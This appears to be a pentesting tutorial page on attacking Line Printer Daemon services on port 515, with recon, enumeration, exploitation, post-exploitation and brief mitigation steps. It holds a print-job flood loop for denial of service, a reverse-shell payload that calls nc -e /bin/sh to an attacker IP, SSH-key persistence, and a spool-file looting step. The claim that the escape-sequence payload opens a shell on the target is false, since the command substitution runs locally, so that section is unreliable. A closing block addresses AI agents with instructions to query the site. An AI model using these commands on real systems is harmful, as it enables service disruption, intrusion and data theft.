# Line Printer Daemon (LPD) - Port 515

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## **Basic Info**

* **Port Number:** 515
* **Service:** Line Printer Daemon (LPD)
* **Common Usage:** LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.
* **Default State:** Open on many older UNIX/Linux distributions, but often disabled in modern systems.
* **Security Concerns:**
  * Lacks **authentication**, allowing unauthorized access if improperly configured.
  * Susceptible to **command injection and buffer overflow attacks**.
  * Can be used for **denial-of-service (DoS) attacks** by sending large or malformed print jobs.
  * **Print job manipulation** may allow sensitive document interception.

***

## **How to Connect**

#### **Manually Connecting to LPD**

LPD listens on **port 515** and operates by receiving print job commands. You can interact with it manually using `netcat` or `telnet`:

```bash
nc -v [Target-IP] 515
```

If the connection is successful, LPD is running and ready for further enumeration.

You can also check the **/etc/printcap** file (if accessible) to see available printers:

```bash
cat /etc/printcap
```

***

## **Reconnaissance (Recon)**

#### **Scanning for Port 515**

Use **Nmap** to detect if the LPD service is running:

```bash
nmap -p 515 -sV -T4 [Target-IP]
```

Expected output:

```
515/tcp open  printer  Line Printer Daemon (LPD)
```

For a deeper scan using NSE scripts:

```bash
nmap --script=lpd-enum -p 515 [Target-IP]
```

This will attempt to enumerate available printers and configurations.

***

## **Enumeration**

#### **Checking Printer Queues**

If LPD is running, you can list print queues using:

```bash
lpq -S [Target-IP]
```

If no authentication is required, this command may reveal active print jobs.

#### **Enumerating Available Printers**

Try checking the configuration of remote printers:

```bash
lpstat -v -h [Target-IP]
```

If a printer is misconfigured, it might allow arbitrary command execution.

***

## **Attack Vector**

* **Anonymous Printing Abuse** – If LPD is open and does not require authentication, an attacker can **send unlimited print jobs**, leading to resource exhaustion (Denial of Service).
* **Command Injection in Print Jobs** – Certain LPD implementations allow **escape sequences** that can lead to remote code execution.
* **Directory Traversal** – Some older LPD implementations allow **path traversal**, enabling an attacker to overwrite files outside the spool directory.
* **Print Job Interception** – If an attacker gains access, they may be able to capture **sensitive documents** submitted for printing.

***

## **Exploitation**

#### **Exploiting Open Print Queue for DoS**

Send a large number of print jobs to overwhelm the system:

```bash
for i in {1..1000}; do
  echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done
```

This fills the print queue, preventing legitimate users from printing.

#### **Command Injection via LPD Escape Sequences**

Some LPD services allow **malicious escape sequences** that execute shell commands. Try submitting a print job with a **malicious payload**:

```bash
echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]
```

If successful, this opens a **reverse shell** on the target system.

#### **Metasploit Exploit for LPD**

Metasploit has modules that can exploit LPD misconfigurations:

```bash
use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit
```

This attempts to **crash the LPD service**.

***

## **Tools Used**

* **Nmap** – Scanning and service detection
* **LPQ / LPSTAT** – Printer queue enumeration
* **Netcat (nc)** – Manual interaction and exploitation
* **Hydra** – Brute-force login attempts (if authentication is enabled)
* **Metasploit** – LPD-specific exploits and auxiliary modules
* **Burp Suite** – If a web-based printer management interface is available

***

## **Post-Exploitation**

#### **Privilege Escalation**

If you gain access through LPD, check for **SUID binaries** to escalate privileges:

```bash
find / -perm -4000 -type f 2>/dev/null
```

#### **Maintaining Access**

To maintain persistence, add an SSH key to the target machine:

```bash
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
```

#### **Extracting Sensitive Print Jobs**

If access is gained, look for **spool files** that contain document data:

```bash
ls -lah /var/spool/lpd/
```

Print jobs often contain **PII (Personally Identifiable Information)** or sensitive **corporate data**.

***

### **Mitigation & Defense**

To **secure** against LPD exploitation:\
✅ **Disable LPD** if not required:

```bash
systemctl stop lpd
systemctl disable lpd
```

✅ **Restrict access** using firewall rules:

```bash
iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP
```

✅ **Enforce authentication** for print jobs and **disable guest access**.\
✅ **Use modern alternatives** like **CUPS (Common Unix Printing System)** with encrypted communication.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/line-printer-daemon-lpd-port-515.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.